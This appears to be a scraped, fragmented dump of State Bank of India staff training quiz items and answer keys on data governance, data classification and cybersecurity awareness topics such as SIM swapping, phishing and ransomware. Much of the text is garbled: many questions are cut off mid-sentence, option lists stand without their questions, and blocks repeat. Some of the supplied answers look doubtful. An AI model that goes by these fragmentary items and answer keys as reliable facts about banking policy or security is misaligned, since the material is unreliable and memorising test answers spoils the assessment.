Data Governance Policy is formulated by which Department:

Data Management Office
Data Protection Office
Information Security Department
Compliance Department
Who would be held responsible for not feeding all the customer details in CBS, given by customer in AOF.
BM
1& 2
Checker
Maker
Which of the below helps in monitoring Data Governance Activities?

Data Process
Data Quality
Note
Dashboard
Data Governance can NOT be achieved by Technology alone.

TRUE
FALSE
What is the frequency of the meeting for Data Governance Council-Business Unit/ Vertical (DGC-BU/V)?
Bi monthly
Quarterly
Half yearly
Monthly
Data Governance process includes activities as:

Establish Data Governance Organisation
Define and Enforce Data Standard and Policies
Audit, Monitor & Control of Data Governance activities
All of the above

DGM & CFO
GM NETWORK
DGM AND CDO
CIRCLE CGM


Create
Read
Modify & Delete
All of the Above
Which one of the following does NOT come under People factor in Data Management
prctices?
Data Architects
Data Owners
Data Trainers
Data Stewards
Assure Data quality
All of the above
Data.
FALSE
TRUE

CGM (R&DB Ops)
CGM (Compliance)
People
Processes
Practices
Technology
Data Management with lack of easy access to information for important stakeholders may
result in just _________
Big Data Strategy
None of the Above

DMD COO
CHAIRMAN
CDMO
MD (R&DB)

All of the above
Inconsistent Data in Annual Income fields vis a vis customer profile may primarily result in
________
Improper KYC
None of the Above

DGM & CCO
DGM (Vigilance)
DGM & CFO
DGM & CRO
All of the Above

Data Quality
Analytical Models
Both 1 & 2
Neither 1 nor 2
Prime objective of Data governance framework is to ensure#Compliance with relevant

legislation, regulatory requirements, policies, procedures and standards.
To define the roles and responsibilities for Data stakeholders, and to establish clear lines
of accountability.
All of the above
Monthly
Quarterly
Half yearly
Bi monthly

Anlytical Processes
All of the Above


FALSE
TRUE

RM
DGM (B&O)
AGM/CM GB
GM NETWORK

All of the Above
External Parties
Magically
Logs and devices

All of the Above

customer in AOF.
BM
1& 2
Checker
Maker

Data Process
Data Quality
Note
Dashboard

TRUE
FALSE
(DGC-BU/V)?
Bi monthly
Quarterly
Half yearly
Monthly

All of the above
LESSON 2
Which of the following is not a type of Data leak

Improper categorization of sensitive Data
Submission of monthly P-report to controller in hard copy
Unauthorized transfer of Data to USB devices
Loss or theft of laptops and mobile devices
Non-sensitive Information includes:

Public Information
Routine Business information
Both 1 & 2
None of the above
Capturing of incorrect interest rate in loan accounts may result in _____________.

Income leakage
Excess Income
Customer Complaints
All of the above
In ________________ Processing, small group of transactions are processed on demand

Virtual Time
System
Batch
Real Time
Which one is NOT an approved way of sharing granular Data/access Data under normal circumstances:
E-mail
Single Sign On (SSO)
Secured File Transfer Protocol (SFTP)
Active Directory login (ADS)
Project Ganga Dashboard include divergences related to:

Key Risk Indicators (KRI) Only
Neither DQ nor KRI
Data Quality (DQ) Only
Both DQ & KRI

SECRET, CONFIDENTIAL, INTERNAL, GENERAL
SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC
SENSITIVE, CONFIDENTIAL, INTERNAL, GENERAL
SENSITIVE, CONFIDENTIAL, INTERNAL, EXTERNAL
Data quality is necessary to fulfil the needs of an organization in terms of

Operations
Planning
Decision-making
All of the above
Scope of Customer Sensitive Granular Data Sharing & Access Framework covers:
All the domestic & foreign offices
All SBI employees
All the third parties having access to SBI network and granular Data
All of the above
Business Leads from Analytics comes under Customer Sensitive Granular Data
TRUE
FALSE
Some of the key Data Privacy initiatives include:

Wi-Fi encryption
Secure Cloud Data Storage system
Secured Network Access
All of the above
In an Account Opening Form, if Data has been provided by customer in non mandatory field ( like mobile number /ema
Leave the field in CBS blank since it is non mandatory in CBS also
Input the Data exactly as given by the customer
Input partial / any similar Data without matching exactly as it is non mandatory in nature
All of the above
Non capturing of PAN in CIF, even if furnished in the AOF, may result in ________.
Deduction of Excess TDS
Non-reflection of TDS in Form 26 AS
Both 1 & 2
Neither 1 nor 2
Which Portal to be accessed for Data Loss Prevention (DLP) incidents

Data Infringement Portal
Project Ganga Dashboard
DQI Dashboard
MIS Online
“Customer PII Data” is classified as ____________ Data

SENSITIVE
INTERNAL
CONFIDENTIAL
PUBLIC
A staff can be held accountable for Data quality errors.

TRUE
FALSE
What does GDPR stand for-

General Data Priority Regulation
Gross Data Protection Regulation
General Data Privacy Regulation
General Data Protection Regulation
Which of the following is true:
Data Governance is about rules how to build the content
Data Privacy is about the rules how to protect and use the contents
Data Loss Prevention (DLP) tool helps in ensuring Data Privacy
All of the above
A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the age of custom
OVD has to be accepted, as it is a govt. document
OVD can be accepted
if one can vote, he is not a minor. OVD should be accepted
DOB on OVD and AOF, if same, then only account may be opened
If a car dealer asks us for a list of customers having existing car loans, to market loans for new cars for us, shall we shar
May be shared by the Field Officer
May be shared by the Branch Manager
Either 1 or 2
Cannot be shared
Incorrect classification of values like Gender or Customer Type comes under which one of the following Data Quality Di
Accuracy
Validity
Consistency
Completeness
“Internal audit reports” is classified as ____________ Data

SENSITIVE
PUBLIC
CONFIDENTIAL
INTERNAL
“SBI telephone directory” is classified as ____________ Data

SENSITIVE
INTERNAL
PUBLIC
CONFIDENTIAL
Capturing of incorrect CRA rating / ECR in a loan account may result in ______.
Incorrect Interest Rate
Incorrect Risk weight
Both 1 & 2
Neither 1 nor 2
The best principles for improving Data Quality include(s)

Doing the things right at very first instance
Doing the right things every time
Either 1 or 2
Both 1 & 2 above
What are the impacts of feeding incorrect date of birth of a customer in CBS
Incorrect Customer profile
Customer could not be able to reset his INB password
1& 2
SOP on Data Loss Prevention
SOP on Data Sharing with External agencies/third parties
SOP on Data Infringement
SOP on Customer Sensitive Granular Data Sharing
What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data Sharing and Access – Within Bank
Regulated & Limited access
Restricted & Registered access
Free & Uncontrolled access
None of the above
In case of demand for customer Data by Regulatory Authority, it be shared as per DG Policy
FALSE
TRUE
Salient features of Project Ganga include:

Customer One view
Business Unit wise error classification
Circle-wise error classification
All of the above


Public Information
Both 1 & 2
None of the above

Income leakage
Excess Income
Customer Complaints
All of the above
In _______Processing, small group of transactions are processed on demand

Virtual Time
System
Batch
Real Time
circumstances:
E-mail
Neither DQ nor KRI
Both DQ & KRI


Operations
Planning
Decision-making
All of the above
All SBI employees
All of the above
TRUE
FALSE

Wi-Fi encryption
All of the above
In an Account Opening Form, if Data has been provided by customer in non mandatory
field ( like mobile number /email ID ), what should be done while inputting in CBS?
All of the above
Both 1 & 2
Neither 1 nor 2

DQI Dashboard
MIS Online
SENSITIVE
INTERNAL
CONFIDENTIAL
PUBLIC

TRUE
FALSE
What does GDPR stand for#


All of the above
A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was
found that the age of customer is less than 18
OVD can be accepted
If a car dealer asks us for a list of customers having existing car loans, to market loans for
new cars for us, shall we share the list?
Either 1 or 2
Cannot be shared
Incorrect classification of values like Gender or Customer Type comes under which one of
the following Data Quality Dimension?
Accuracy
Validity
Consistency
Completeness

SENSITIVE
PUBLIC
CONFIDENTIAL
INTERNAL

SENSITIVE
INTERNAL
PUBLIC
CONFIDENTIAL
Both 1 & 2
Neither 1 nor 2

Either 1 or 2
Both 1 & 2 above
1& 2
No Impact

What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data
Sharing and Access – Within Bank’s Environment’:
None of the above
In case of demand for customer Data by Regulatory Authority, it be shared as per DG

Policy
FALSE
TRUE

Customer One view
All of the above
LESSON 3
A type of attack whereby malicious commands are sent to a system/application through unauthorized channels.
It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet traff
It is an attack meant to shut down a machine or network, making it inaccessible to its intended users
An attack used to monitor and potentially modify communications between two users.
Which one of the following is a precautions to be taken while operating the ATM?
Taking help from unknown persons if there is a problem with the ATM
Allow another person to watch while entering PIN
Handing of card to other person who offered help to operate ATM
Check if any extra suspicious device is attached to the ATM machine.
Which of the following is not a stage in SIM swapping?

After customer verification, the mobile operator deactivates the old SIM card in customer possession and issues a new SIM
Fraudsters obtain customer’s personal data through phishing or social engineering.
Under the pretext of having lost the phone, fraudsters contact the Mobile operator and create a fake ID.
All the options above are stages of SIM Swapping
Select the correct statement about the impact of Cyber Risks.

The impact on the services or the potential of the attack infecting our customers’ systems.
Loss of Intellectual Property
financial cost in managing a cyber-attack
All are true
__________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?

Keylogger
Scareware
Fileless
Spyware
Which of the following principles of the first of the CIA Triad Confidentiality is/are Correct?
a.Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects, or resource
b.The goal of confidentiality protection is to prevent unauthorized access to the information.
c.Confidentiality focuses security measures on ensuring that none other than the sender of a message is able to read it.
d.Secure encryption of the information ensures Confidentiality.
Only a and b
a, b and c
a, c and d
a, b and d

SIM Swapping is a fraud that occurs when the fraudsters manage to get a new SIM card issued for a specific registered mo
Phishing or social engineering techniques are used to obtain personal information of the customers/users.
Fraudsters get access to the root of the mobile phone through SIM Swapping
Option b & c
With the enhanced sharing of information over a global network for almost all life functions , which one of the followin
Authentication
Non-repudiation
Authorization
Non-refutation
What is not true about myths associated with Cyber Risk?
Cyber threat always starts externally
IT team is alone not responsible for Cyber Security
Compliance and security are the same
Cyber security is an issue which is related with technology
How does the use of Virtual keyboard protect the customer?

It is a useless feature
It protects against Keylogger malware
It protects against computer Viruses
It protects against computer Worms.
Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what was co
Silk Road 2.0
DisrupTor
Tor
Dark Market
The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit, Acc
Vishing
Spoofing
Stegnography
Identity theft
The technique used to send the emails to all the employees of the Bank is known as ____________.
Smishing
Vishing
Phishing
Spear Phishing
The Cyber-attacks originate through a third party vendor are also called ________?
Service provider attacks
Supplier attacks
Supply chain attacks
Vendor attacks
What makes SolarWinds attack an unusual hack?

The hackers through one malicious code in the application of SolarWinds vendor’s application gained access to Orion soft
The hackers targeted a government agency like Pantagon
The hackers seriously damaged the energy supply
The hackers through one malicious code in SolarWinds Orion software gained access to thousands of other companies.
Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a Sunday and Bank is closed.
Change the password
Lock User access using the relevant link
Contact the Branch on Monday to deactivate INB facility
Type an incorrect login password 4 times so that the username gets locked for a day
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is the ne
Audio Captcha in the login screen.
Virtual keyboard in the login screen
OTP has been made mandatory at the time of login
Image based Captcha in the login screen
Which one of the following is NOT a type of MITM attack?

DNS Spoofing
Logic Bomb
IP Spoofing
Wi-fi eavesdropping
Which of the following principles of the second of CIA Triad Integrity is/are Correct?
a.Integrity is the concept of protecting the accuracy and completeness of information and processing methods.
b.Integrity protection prevents any kind of alteration of the information.
c.Properly implemented integrity protection provides a means for authorized changes while protecting against intended a
d.Use of a secure Hashing algorithm for the information ensures Integrity.
Only a and b
a, b and c
a, c and d
a, b and d
Which of the following browsers allows access to the Network which is popular for implementing encrypted routing te
Chrome
Edge
Tor
Firefox
The fraudster gets the personal details of the people through _______technique.
Spoofing
Keylogger malware
Vishing
Social engineering
Which of the following is not the examples of data?

Employees information
Customer Information
Official conversation over phone
All are examples of data
Which one is not an option for disabling UPI services?

YONO Main Screen UPI Enable/Disable UPI
CBS App menu UPI Disable/Re-enable UPI
Contact Centre: 1800112211/18004253800
Branch Interface (Maker-Checker Concept):
Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment. He
It should start with https://www.retail.onlinesbi.com
It should start with https://www.merchant.onlinesbi.sbi
It should start with https://www.onlinesbi.com
It should start with https://www.retailmerchant.sbi
If you want to change the username and password for your SBI Internet banking, which of the following statements is c
You cannot change the Username but he/she can change the password at any time
You can change the Username but not the password
You can only interchange the username by the password and vice versa
You can change both the Username and password at any time

Organizations use Bulk SMS service for marketing and communications.
Bulk SMS simply means sending a large volume or quantity of SMS
Bulk SMS is sending SMS from mobile to many people.
A Cyber-Attack
is not limited to, stealing, altering or destroying the systems/network, disrupting operations and causing information or id
is a targeted assault on the Bank’s cyberspace and its underlying infrastructure systems
option a or b
option a & b
_____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a conn
Man in the Middle attack
Bluesnarfing
Steganography
Spoofing
Which one of the following statements is FALSE about APT attacks?

A type of cyberattack where an unauthorized attacker code enters a system and remains there.
APT attacks may help the attacker in stealing information
APT attacks may be identified immediately as it shuts down the whole system
In APT attacks, attacker code may spread into other machines in the victim’s network and compromise them.
SBI internet banking site provides a facility to bypass such keylogger malware. Identify the feature.
Audio Captcha
Image Captcha
Online Virtual Keyboard
Biometric access

A type of attack whereby malicious commands are sent to a system/application through
unauthorized channels.
It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network
with a flood of Internet traffic from multiple computers at the same time
It is an attack meant to shut down a machine or network, making it inaccessible to its
intended users
After customer verification, the mobile operator deactivates the old SIM card in customer
possession and issues a new SIM card to the fraudster. With the new SIM, fraudsters can
receive authentication codes or OTP for banking transactions.
Under the pretext of having lost the phone, fraudsters contact the Mobile operator and
create a fake ID.

All are true

Keylogger
Scareware
Fileless
Spyware
a.Confidentiality is the concept of the measures used to ensure the protection of the
secrecy of data, objects, or resources.
b.The goal of confidentiality protection is to prevent unauthorized access to the
information.
c.Confidentiality focuses security measures on ensuring that none other than the sender of
a message is able to read it.
Only a and b
a, b and c
a, c and d
a, b and d

SIM Swapping is a fraud that occurs when the fraudsters manage to get a new SIM card
issued for a specific registered mobile number.
Phishing or social engineering techniques are used to obtain personal information of the
customers/users.
Option b & c
With the enhanced sharing of information over a global network for almost all life
functions , which one of the following has become the latest addition to the essential
objectives of Information Security after the CIA Triad?
Authentication
Non-repudiation
Authorization
Non-refutation


Which one of the following is the leading illicit dark web marketplace which was taken
down by the FBI in what was considered then as a significant action on the Dark web
market?
Silk Road 2.0
DisrupTor
Tor
Dark Market
The technique for sending SMS that appears to be initiated from the organization for KYC
updation, Account credit, Account suspension, winning lottery, SIM block, eKYC updates
etc. is known as________.
Vishing
Spoofing
Stegnography
Identity theft
____________.
Smishing
Vishing
Phishing
Spear Phishing
Supplier attacks
Vendor attacks

The hackers through one malicious code in the application of SolarWinds vendor’s
application gained access to Orion software
The hackers through one malicious code in SolarWinds Orion software gained access to
thousands of other companies.
Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is
a Sunday and Bank is closed. What immediate steps would you NOT advise him?
Change the password
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using
this credential. What is the new security feature in OnlineSBI?

DNS Spoofing
Logic Bomb
IP Spoofing
Wi-fi eavesdropping
a.Integrity is the concept of protecting the accuracy and completeness of information and
processing methods.
c.Properly implemented integrity protection provides a means for authorized changes while
protecting against intended and malicious unauthorized activities (such as viruses and
intrusions) as well as mistakes made by authorized users (by commission or
omission).
Only a and b
a, b and c
a, c and d
a, b and d
Chrome
Edge
Tor
Firefox
Spoofing
Keylogger malware
Vishing
Social engineering


Contact Centre: 1800112211/18004253800
making online payment. He is redirected to a site of SBI. Before he logs in what should be
If you want to change the username and password for your SBI Internet banking, which of
the following statements is correct?

A Cyber-Attack
is not limited to, stealing, altering or destroying the systems/network, disrupting operations
and causing information or identity theft.
option a or b
option a & b
connection. Once such a connection is established then the attacker will be able to steal
Bluesnarfing
Steganography
Spoofing

A type of cyberattack where an unauthorized attacker code enters a system and remains
there.
In APT attacks, attacker code may spread into other machines in the victim’s network and
compromise them.
SBI internet banking site provides a facility to bypass such keylogger malware. Identify the
feature.
Audio Captcha
Image Captcha
Biometric access
LESSON 4
1
Which one of the following is the most important aspect for an organization as big and global as SBI to protect itself fro
A training program for all the vendors to underscore secure coding practices.
A training and awareness program for all the employees in the Information Security department.
An awareness program among all the customers to provide education and guidance on a range of topics, including email,
A training awareness program that would provide education and guidance on a range of information security topics to all
2
ATM Channel Manager
Branch Manager
Regional Manager (RBO)
3
Which one of the following options does not substantiate the Acceptable Usage Policy of our Bank?
We need to protect the data by following acceptable usage policy guidelines of our bank.
All the workstations / devices should be protected by strong passwords.
However, Mobile and laptop given to the staff for personal holding have exceptions to the policy.
Always lock your desktop while leaving your seat.
4
Which of the following statements is NOT correct in the WannaCry case?
A Windows vulnerability discovered by the United States National Security Agency (NSA).
After the system got affected by WannaCry, Microsoft released the patch for the system which has updated security.
The attackers collective called The Lazarus Group.
This was only one month after Windows released patches for the exploit, meaning that computers that had yet to update
5
All of the above statements are correct
It can expose the users to Man-in-the-middle attacks
The free WiFi could be a rouge network, harvesting the internet user’s data.
Hackers may be misusing the free Wi-Fi to distribute malware
6
Websites use CAPTCHA to avoid password guessing by automated tools to prevent from _______.
Shoulder surfing
Dictionary Attack
Bruetforce Attack
Guessing
7
In case of any breach in a Social Media Handle, delete your Social Media Account instead of changing the password.
Password is required to be sufficiently long and secret
Users are responsible for all activities originated from their User credentials
Password should be treated like signature
8
Phishing / Vishing attacks on customers resulting cumulative loss for the customer(s) exceeding ₹ 50 lakh
All incidents which lead to customer service disruptions due to non-availability of IT systems
All of the above
9
If a Bank always allow some of the employees to bring their own laptops, smart phones, tablets etc. to office for office
Bring Your Own Desktop
Buy Your Own Device
Budget Your Own Device
10
Can we create the password in other regional language (Other than English and Hindi) in Retail Internet Banking?
You can use the multilingual image based virtual keyboard in Hindi or English only.
The multilingual image based virtual keyboard is available in 13 languages.
You can use the multilingual image based virtual keyboard in Hindi or Tamil only
The multilingual image based virtual keyboard is available in Hindi , Tamil, Oriya or Marathi only
11
Pick the odd one.
Passwords should be complex, sufficiently long and secret.
Passwords must be created using small & upper case, when own name or short form of own name and own initials are us
Users are responsible for all activities originating from their user credentials.
Passwords should not be treated like signatures.
12
Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank?
Users should not install any software that is not authorized for the Bank’s business.
Users on whose PC / Server such software runs shall be solely responsible for Copyrights / IPR violation, Legal and Penal a
Successful backup of critical applications or data should be ensured yearly and to be kept offsite.
All are true
13
Which of the following statements is not true about Acceptable usage policy (IS Policy) of our Bank?
Employees, to whom State Bank owned laptops or any other Portable devices are issued, are responsible for its safe custo
Employees who are authorized to access emails and Bank’s data on mobile devices should ensure that MDM application s
Employee’s mobile devices need not have Antivirus software
Loss of portable devices should be reported immediately to the local police and to the appropriate authority.
14
What action will you take, when you are defrauded?
Change the username immediately
Lock the user access immediately
Send a written letter to the branch immediately
Write a letter to the RBI immediately
15
The company asked their employees to use their own devices and internet access while working from home. List some
that authorized antivirus is installed in the devices of the employees (ii) Ensuring that appropriate software patches are
enterprise VPN
Options (i) and (ii) are sufficient
Options (i) alone is sufficient
Options (i) , (ii) and (iii) are necessary
Option (ii) alone is sufficient
16
Which of the following options is NOT the best password security practices?
Enable two-factor authentication
Never completely trust service providers
Change your password, only if you suspect it may have been exposed
Never reuse a password
17
Which one of the following options is not considered as incident for reporting to RBI, NCIIPC and CERT-In?
Frauds/ Customer complaints related to frauds.
Accounting/clerical errors (incorrect ledger posting – cr/dr) that are rectified subsequently.
DoS/DDoS attack not lasting beyond 30 minutes contiguously or not impacting the customer service/digital channels even
All of the above
18
Which of the following statements is correct regarding creation of Profile password using the Multilingual Image based
The Profile password should be a combination of alphabets in two of the languages chosen
The Profile password should be a combination of alphabets (in the language chosen), and numerals and special character
The Profile password should be a combination of alphabets (in the language chosen), and numerals and images
The Profile password should be a combination of alphabets (in the language chosen) and numerals
19
Which one of the following applications is not a threat to compromise confidentiality of the data of portable devices?
Facebook
Air watch agent
WhatsApp
True caller
20
What are the ways you can report an unauthorised transaction (ATM) without visiting the branch?
Call dedicated number 1800 1111 09 also Can raise through https://crcf.sbi.co.in
Call the Branch
Call ATM Channel Manager OR ATM Channel Manager Facilitator linked to the ATM
Option a or c
21
Ensuring the physical access to the systems room is restricted and monitored
Providing connectivity through a reputed service provider
Installing Anti-Virus in these systems
Arranging official laptops with proper configuration for the employees
22
Which of the following will not be considered as cyber incidents for reporting to RBI?
Incorrect accounting entries that are rectified subsequently
All the options will not be considered
Customer complaints related to frauds.
Physical tampering of ATMs
23
Select the correct statement in this case.
Ransomware Malware uses simple encryption codes to encrypt a victim’s files.
The patches could not stop the spreading malware
The motive for this Ransomware attack is always monetary
Ransomware Malware affects more devices in less time.
24
Which one of the following options is NOT a violation of acceptable usage policy?
The laptop was not protected by password
The laptop was kept open, and the desktop was not locked
There was a breach of critical and confidential data.
There was a data vulnerability due to lack of Anti-virus
25
What is the timelines for reporting of cyber incidents to RBI and other Statutory Authorities CERT-In & NCIIPC? Who sh
All cyber security incidents should be reported within 24 hours by Incident Response & Management Team
All cyber security incidents should be reported within 2 to 6 hours by Incident Response & Management Team
26
Use of other officers' user ids or using a false identity.
Authorized exchange of proprietary information or confidential information
Use the accounts of others with their permission
Creation and exchange of e-mails information or content for official purpose.
27
Cyber security incidents can be reported
by any employee or public
by home branch only
by public
by any employee
28
Method that is NOT suggested to prevent new account fraud.
Ensure ATM Card connected to operational SB Account is blocked
Contact the bank immediately and ensure all the operating accounts are closed
Ensure to lock the internet banking user ID.
Applying the use of end-to-end encryption to protect online transactions.
29
What should be the minimum and maximum length of the login password in Retail Internet Banking?
Minimum length should be 6 characters and maximum length 15 characters
30
For online meetings, Manage screen sharing options. Change screen sharing to “Host Only.” Avoid file sharing
Do not play online games on company devices as they may download trojans.
Secure your Wi-Fi router connections by enabling WPA2 + AES security
For web security, verify full URL by clicking the link, but do not give any personal/confidential information
image?
A training and awareness program for all the employees in the Information Security
department.
An awareness program among all the customers to provide education and guidance on a
range of topics, including email, cloud and mobile security.
A training awareness program that would provide education and guidance on a range of
information security topics to all the internal users of its systems and applications.
2
ATM Channel Manager
Branch Manager
3
Which one of the following options does not substantiate the Acceptable Usage Policy of
our Bank?
However, Mobile and laptop given to the staff for personal holding have exceptions to the
policy.
4
After the system got affected by WannaCry, Microsoft released the patch for the system
which has updated security.
This was only one month after Windows released patches for the exploit, meaning that
computers that had yet to update were still left vulnerable.
5
6
Websites use CAPTCHA to avoid password guessing by automated tools to prevent from
_______.
Shoulder surfing
Dictionary Attack
Bruetforce Attack
Guessing
7
In case of any breach in a Social Media Handle, delete your Social Media Account instead
of changing the password.
8
Phishing / Vishing attacks on customers resulting cumulative loss for the customer(s)
exceeding ₹ 50 lakh
All incidents which lead to customer service disruptions due to non-availability of IT
systems
All of the above
9
tablets etc. to office for office work. This policy is called BYOD. What does BYOD stand
for?
Buy Your Own Device
10
Can we create the password in other regional language (Other than English and Hindi) in
Retail Internet Banking?
The multilingual image based virtual keyboard is available in Hindi , Tamil, Oriya or Marathi
only
11
Pick the odd one.
Passwords must be created using small & upper case, when own name or short form of
own name and own initials are used.
12
Users on whose PC / Server such software runs shall be solely responsible for
Copyrights / IPR violation, Legal and Penal actions as per IT Act
Successful backup of critical applications or data should be ensured yearly and to be kept
offsite.
All are true
13
Which of the following statements is not true about Acceptable usage policy (IS Policy) of
our Bank?
Employees, to whom State Bank owned laptops or any other Portable devices are issued,
are responsible for its safe custody
Employees who are authorized to access emails and Bank’s data on mobile devices
should ensure that MDM application software is installed for on those mobile devices.
Loss of portable devices should be reported immediately to the local police and to the
appropriate authority.
14
15
these conditions: (i) Ensuring that authorized antivirus is installed in the devices of the
employees (ii) Ensuring that appropriate software patches are updated in the
devices of the employees (iii) Asking the employees to use enterprise VPN
16
17
Which one of the following options is not considered as incident for reporting to RBI,
NCIIPC and CERT-In?
DoS/DDoS attack not lasting beyond 30 minutes contiguously or not impacting the
customer service/digital channels even if last beyond 30 minutes.
All of the above
18
The Profile password should be a combination of alphabets in two of the languages
chosen
The Profile password should be a combination of alphabets (in the language chosen), and
numerals and special characters
numerals and images
The Profile password should be a combination of alphabets (in the language chosen) and
numerals
19
Which one of the following applications is not a threat to compromise confidentiality of the
data of portable devices?
Facebook
Air watch agent
WhatsApp
True caller
20
What are the ways you can report an unauthorised transaction (ATM) without visiting the
branch?
Call the Branch
Option a or c
21
22
23. Select the correct statement in this case.

24
25
All cyber security incidents should be reported within 24 hours by Incident Response &
Management Team
All cyber security incidents should be reported within 12 hours by Incident Response &
Management Team
All cyber security incidents should be reported within 2 to 6 hours by Incident Response &
Management Team
All cyber security incidents should be reported within 24 to 48 hours by Incident Response
& Management Team
26
27
by home branch only
by public
by any employee
28
29
What should be the minimum and maximum length of the login password in Retail Internet
Banking?
30
For online meetings, Manage screen sharing options. Change screen sharing to “Host
Only.” Avoid file sharing
For web security, verify full URL by clicking the link, but do not give any
LESSON 1

CIRCLE CGM


All of the Above
Data Trainers

All of the above
People

CHAIRMAN

All of the above

DGM & CFO

All of the Above

Both 1 & 2

All of the above
Quarterly

All of the Above

TRUE

DGM (B&O)

All of the Above


All of the Above

Maker

Data Quality

TRUE
Monthly

All of the above

CIRCLE CGM


All of the Above

All of the above
Data.
CGM (R&DB Ops)
People
Data Management with lack of easy access to information for important stakeholders may
result in just _________

All of the above
Inconsistent Data in Annual Income fields vis a vis customer profile may primarily result in
________

DGM & CFO

All of the Above

Both 1 & 2
Prime objective of Data governance framework is to ensure#Compliance with relevant

legislation, regulatory requirements, policies, procedures and standards.
All of the above
Quarterly

All of the Above


TRUE

DGM (B&O)

All of the Above


All of the Above
customer in AOF.
Maker

Data Quality

TRUE
(DGC-BU/V)?
Monthly

All of the above
Q: Data Governance Organisation involves a multi-tiered combination of business and

A: All of the above
Q: Data Governance Policy is applicable to all the domestic offices of SBI including:
A: All of the above
Q: What is the frequency of the meeting for Data Governance Council-Business Unit/
Vertical (DGC-BU/V)?
A: Monthly
Q: Data processes must also put in place ______

A: All of the Above
Q: At the time of account opening, it was found that Educational Qualification was not
mentioned by the customer in AOF, but it is a mandatory filed in CBS
A: Teller should contact, the customer and get the required details and then fill in CBS
Q: DBAs are NOT part of Data Stakeholders

A: FALSE
Q: Data Governance process includes activities as:

A: All of the above
Q: Data governance processes primarily must focus on __________

A: Business Needs
Q: Data Governance can NOT be achieved by Technology alone.

A: TRUE
Q: Data Governance Council-Business Unit/Vertical is being headed by

A: CGM
Q: Data processes must Include ____________
A: All of the Above
Q: Data Management Officer is accountable for all Data Governance related activities of
their respective department
A: FALSE
Q: Data Governance Policy is formulated by which Department:

A: Compliance Department

A: All of the Above

A: All of the Above
Q: Data Governance Policy is applicable to third parties having access to SBI network
and Data
A: TRUE
Q: Administrative office Data Governance Council (A-DGC), is headed by

A: DGM (B&O)
Q: Where does Data come from?

A: People, Process and Technology
Q: Which among the following play major role in support of company-wide Data quality
initiatives?
A: People
Q: Data is always originated within the organization

A: FALSE
Q: (i) Data Governance is about the rules how to build the content.
(ii) Data Privacy is about the rules how to protect and use the content.
A: Only (ii) is correct
Q: Against availability of sizeable number of eligible customers only few confirmed leads
could be generated for an Analytics based product. What could be the underlying
reason?
A: Poor Data Quality
Q: Incorrect handling of data may result in exposing an organization to significant

liabilities.
A: TRUE
Q: Technology Solutions which help in data Governance initiatives include ____

A: All of the Above
Q: Which activity are considered under Data Management?

A: All of the above
Q: What are the main sources for low Data Quality?

A: Manual Data Entry
Q: While creating new CIF, customer has given marital status, but as it is not mandatory
in CBS:
A: As the customer has given the details in AOF, teller should fill the same in CBS

A: FALSE
A: Quarterly
Q: Technology Solutions which help in data Governance initiatives include ______

A: All of the Above
Q: Process for submission and handling of the Data request is mentioned in

A: Both
Q: _________________is ultimately accountable with regard to the definition, Data quality

A: Data Custodian

A: All of the Above
Q: Who among the following has a role to ensure that data governance initiatives are
aligned with business needs
A: Data Team
Q: Inconsistent Data in Annual Income fields vis a vis customer profile may primarily result
in ________
A: Incorrect AML/CFT compliance

Q: Data Governance Policy is applicable to third parties having access to SBI network and
Data.
A: TRUE
Q: What is/are the responsibility(ies) of the Data Governance Council (DGC)

A: All of the above
could be generated for an Analytics based product. What could be the underlying reason?

A: All of the above
Q: Data Governance Policy is applicable to

A: All employees of the Bank
Q: Prime objective of Data governance framework is to ensure#

A: All of the above
Q: Data Management Office reports to which of the DMDs
A: DMD & Chief Information Officer

A: TRUE
Q: As per the Bank's Data Governance structure, presently which is the Apex body for
Data Governance?
A: Apex level Data Governance Council (ADGC)
Q: Which of the following is/are a Key Data Quality Dimension?

A: All of the above
Q: The primary priority of Data Processes must be _____

A: MIS Needs
Q: ________shall ensure that there is commensurate adherence, management and

periodic upkeep/review for Data in their respective custodies, asprescribed by Data
Governance Policy
A: Data custodians
initiatives?
A: Regulators
Q: Data-driven business decisions are possible when _____ is involved in the Data
Governance.
A: Business Unit
Q: ____ is DGO of Circle

A: DGM & CRO

A: Business Needs

A: Definitions of how data will be moved and changed

A: All of the Above
Q: The word “Data” shall collectively refer to the following descriptions:

A: All of the above
Q: Analytics refers to the process of using Data in order to:

A: All of the above
LESSON 2

Both 1 & 2

All of the above

Batch
E-mail

Both DQ & KRI


All of the above
All of the above
TRUE

All of the above
In an Account Opening Form, if Data has been provided by customer in non mandatory field+
( like mobile number /email ID ), what should be done while inputting in CBS?
Both 1 & 2


SENSITIVE

TRUE

All of the above
A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the
age of customer is less than 18
If a car dealer asks us for a list of customers having existing car loans, to market loans for new cars for us,
shall we share the list?
Cannot be shared
Incorrect classification of values like Gender or Customer Type comes under which one of the following Data
Quality Dimension?
Validity

CONFIDENTIAL

PUBLIC
Both 1 & 2

Both 1 & 2 above

What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data Sharing and Access – Within Bank
TRUE

All of the above


Both 1 & 2

All of the above
In _______Processing, small group of transactions are processed on demand
Batch
circumstances:
E-mail

Both DQ & KRI

All of the above
All of the above
TRUE
FALSE

All of the above
In an Account Opening Form, if Data has been provided by customer in non mandatory
field ( like mobile number /email ID ), what should be done while inputting in CBS?
Both 1 & 2


SENSITIVE

TRUE
What does GDPR stand for#


All of the above
A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was
found that the age of customer is less than 18
Incorrect classification of values like Gender or Customer Type comes under which one of
the following Data Quality Dimension?
Validity
